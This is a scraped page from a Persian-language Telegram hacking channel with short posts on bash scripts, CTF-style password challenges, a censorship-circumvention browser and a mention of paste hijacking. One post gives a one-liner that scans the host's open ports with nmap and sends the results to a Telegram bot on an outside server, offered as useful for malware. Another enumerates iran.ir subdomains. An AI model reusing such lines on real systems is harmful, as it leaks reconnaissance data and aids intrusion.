MrSaad – Telegram
MrSaad
305 subscribers
72 photos
8 videos
3 files
52 links
( '•_•' == '^_^' )
Download Telegram
MrSaad
https://chapar.zya.me/
داشتیم تو پوشه users گشت میزدیم دیدیم هانترای مهربان و زحمت کش، زحمت کشیدن و چندتا پوشه و فایل با آسیب پذیریای مختلف آپ زدن روی هاست

اومدیم یه اسکریپت پیاده کردیم که پوشه و فایل‌های غیر مجازو دیلیت کنه نسبت به نوع رجکسی که دادیم بهش

Source : https://github.com/MrBanana2045/Checker
😎2👍1
🔥1😁1
MrSaad
New Challenge
تغییرات :
* آمار فعالیت ها
* بازیابی رمز عبور
👌2
یه اسکریپت مشابه ابزار pv
اومدیم یه نمونه الگوریتم پیاده کردیم که کار ابزار pv رو انجام بده
while IFS= read -r line; do
tm=$(echo "7 / ${#line}" | bc -l)
for (( x=0; x<${#line}; x++ )); do
printf "%s" "${line:x:1}"
sleep "$tm"
done
done < "hello"
👏1
DeCoder Challenge
https://decc.iceiy.com/dcc
2
بنظرم الان تایمی نیست ک این بحثو باز کنم ولی حالا ک اینترنت تاحد قابل قبولی بهتر شده، پس یه آپ رو معرفی میکنم که میتونه به راحتی فایروالی ک روی شبکه اعمال کردن رو دور بزنه، اسم آپ Freebrowser بچه‌های چین برای فایروال چینی توسعه دادن بنظرم می‌تونه گزینه خوبی برای فیلترینگ باشه و چون ماهم از این فایروال استفاده میکنیم قطعا یه ریزلت خوبیو میتونیم داشته باشیم
شاید الان بگین ( حالا ک همه چی اوکی شده لازمش نداریم )
ولی خب هیچکس از فرداش خبری نداره شاید شانسمون دوباره تکرار شد.

GitHub :
https://github.com/greatfire/freebrowser

Play store :
https://play.google.com/store/apps/details?id=org.greatfire.freebrowser
2🔥2
ip=$(ifconfig | grep "inet " | awk 'NR==1 {print $2}'); ports=$(nmap $ip | awk '/PORT/{flag=1; next} flag' | awk '{print $1}' | paste -sd ' ' -);  end="$ip: $ports"; curl -s -X POST "https://telegram.mrsaad.workers.dev/botTOKEN/sendMessage" --data-urlencode "chat_id=-ID" --data-urlencode "text=$end" | jq

آیپیو اسکن میکنه میفرسته برای بات تلگرامی
ممکنه برای نوشتن بدافزار بدردتون بخوره
3
گفتیم حالا ک بحث api روبیکا داغه ماهم یه حرکتی نثارشون کنیم

https://github.com/MrBanana2045/Proj_BASH/blob/main/Interface.sh

یه رابط پیام به پیام از تلگرام به روبیکا و بلعکس

سرعتش اوکیه فقط یه ریز باگی داره که بعد از چندتا پیام رفع میشه
2🍌2
Subdomain checker

for domain in $(curl -s "https://crt.sh/?q=iran.ir&output=json" | grep -oP '(?<="name_value":")[^"]+' | sed -e 's/*.//g' -e 's/\\n/\n/g' | sort -u); do echo "$domain - $(curl -s -o /dev/null -w "%{http_code}" https://$domain)"; done
3🍌1
MrSaad
DeCoder Challenge https://decc.iceiy.com/dcc
dyc.zya.me

New update
موضوع چلنج چیه ؟
کلاینتی ک شما باشی باید بگردی پسوردو پیدا کنی و درستشو وارد کنی حالا با هر روشی که بلدی تست بزن و ثبتش کن
اگه پسورد معتبر بود چلنج میره یه مرحله بالاتر و سورس کد تغییر میکنه به همراه پسورد، ممکنه هش بشه، تو پوشه یا فایل سیو بشه یا داخل دیتابیس قرار بگیره ک شما با آسیب پذیریایی ک بلدی پسوردو پیدا میکنی و چلنج برای همه چنج میخوره و باید چلنج جدیدو حل کنین

چلنجا اضافه میشن و آپدیتای جدیدتری تو راهه

فقط برای به چالش کشیدن تواناییتون ...
1🍌1
وقتی کارفرما از شما کوکوسبزی ساده میخواد
بهش قرمه سبزی با ته‌دیگ زعفرونی ندید
2👍2
🔥1
یه نمونه از حمله paste hijacking